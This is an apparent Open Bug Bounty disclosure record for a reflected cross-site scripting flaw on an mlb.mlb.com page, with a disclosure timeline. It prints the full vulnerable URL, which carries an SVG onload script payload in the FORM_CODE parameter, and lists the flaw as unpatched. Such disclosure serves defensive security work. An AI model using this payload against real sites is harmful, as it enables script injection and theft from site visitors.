mlb.mlb.com XSS vulnerability

2017-04-29T12:22:00
ID OBB:229173
Type openbugbounty
Reporter MrJamesHemmings
Modified 2017-05-29T07:15:00

Description

Vulnerable URL:
http://mlb.mlb.com/mlb/news/entertainment/movie_madness/bracket_success.jsp?FORM_CODE=mlb_2008_bball_movie_madness%22--!%3E%3CSvg/Onload=confirm%28%27OPENBUGBOUNTY%27%29%3E%22&b;_c_2_1=Bull%20Durham&b;_c_2_2=Major%20League&b;_c_2_3=A%20League%20of%20Their%20Own&b;_c_2_4=Fever%20Pitch&b;_c_2_5=Bad%20New%20Bears%20%281976%29&b;_c_2_6=The%20Scout&b;_c_2_7=Mr.%20Baseball&b;_c_2_8=The%20Bingo%20Long%20Traveling%20All-Stars%20%26amp%3B%20Motor%20Kings&b;_c_3_1=Bull%20Durham&b;_c_3_2=A%20League%20of%20Their%20Own&b;_c_3_3=Bad%20New%20Bears%20%281976%29&b;_c_3_4=The%20Bingo%20Long%20Traveling%20All-Stars%20%26amp%3B%20Motor%20Kings&b;_c_4_1=A%20League%20of%20Their%20Own&b;_c_4_2=Bad%20New%20Bears%20%281976%29&b;_c_5_1=A%20League%20of%20Their%20Own&b;_d_2_1=The%20Natural&b;_d_2_2=For%20Love%20of%20the%20Game&b;_d_2_3=The%20Rookie&b;_d_2_4=61*&b;_d_2_5=Eight%20Men%20Out&b;_d_2_6=Don%27t%20Look%20Back&b;_d_2_7=Cobb&b;_d_2_8=The%20Final%20Season&b;_d_3_1=The%20Natural&b;_d_3_2=61*&b;_d_3_3=Eight%20Men%20Out&b;_d_3_4=The%20Final%20Season&b;_d_4_1=61*&b;_d_4_2=Eight%20Men%20Out&b;_d_5_1=61*&b;_l_2_1=Field%20of%20Dreams&b;_l_2_2=Chasing%20October&b;_l_2_3=Hank%20Aaron%3A%20Chasing%20the%20Dream&b;_l_2_4=Up%20For%20Grabs&b;_l_2_5=When%20it%20Was%20a%20Game&b;_l_2_6=Tiger%20Town&b;_l_2_7=Ken%20Burns%27%20Baseball&b;_l_2_8=The%20Life%20and%20Times%20of%20Hank%20Greenberg&b;_l_3_1=Field%20of%20Dreams&b;_l_3_2=Up%20For%20Grabs&b;_l_3_3=When%20it%20Was%20a%20Game&b;_l_3_4=Ken%20Burns%27%20Baseball&b;_l_4_1=Field%20of%20Dreams&b;_l_4_2=Ken%20Burns%27%20Baseball&b;_l_5_1=Field%20of%20Dreams&b;_o_2_1=Pride%20of%20the%20Yankees&b;_o_2_2=The%20Winning%20Team&b;_o_2_3=It%20Happens%20Every%20Spring&b;_o_2_4=Damn%20Yankees&b;_o_2_5=The%20Jackie%20Robinson%20Story&b;_o_2_6=The%20Stratton%20Story&b;_o_2_7=Fear%20Strikes%20Out&b;_o_2_8=The%20Kid%20From%20Left%20Field&b;_o_3_1=Pride%20of%20the%20Yankees&b;_o_3_2=It%20Happens%20Every%20Spring&b;_o_3_3=The%20Jackie%20Robinson%20Story&b;_o_3_4=Fear%20Strikes%20Out&b;_o_4_1=Pride%20of%20the%20Yankees&b;_o_4_2=The%20Jackie%20Robinson%20Story&b;_o_5_1=Pride%20of%20the%20Yankees&b;_f_1_1=A%20League%20of%20Their%20Own&b;_f_1_2=61*&b;_f_1_3=Field%20of%20Dreams&b;_f_1_4=Pride%20of%20the%20Yankees&b;_f_2_1=61*&b;_f_2_2=Field%20of%20Dreams&b;_f_3_1=Field%20of%20Dreams&submitButton;=%20Submit%20#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 31.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 April, 2017 12:22 GMT
Vulnerability existence verified and confirmed| 1 May, 2017 06:31 GMT
Generic security notifications sent to website owner| 1 May, 2017 06:31 GMT
Customized security notification sent to website owner| 1 May, 2017 06:31 GMT
Notification sent to subscribers (without technical details)| 1 May, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 29 May, 2017 07:15 GMT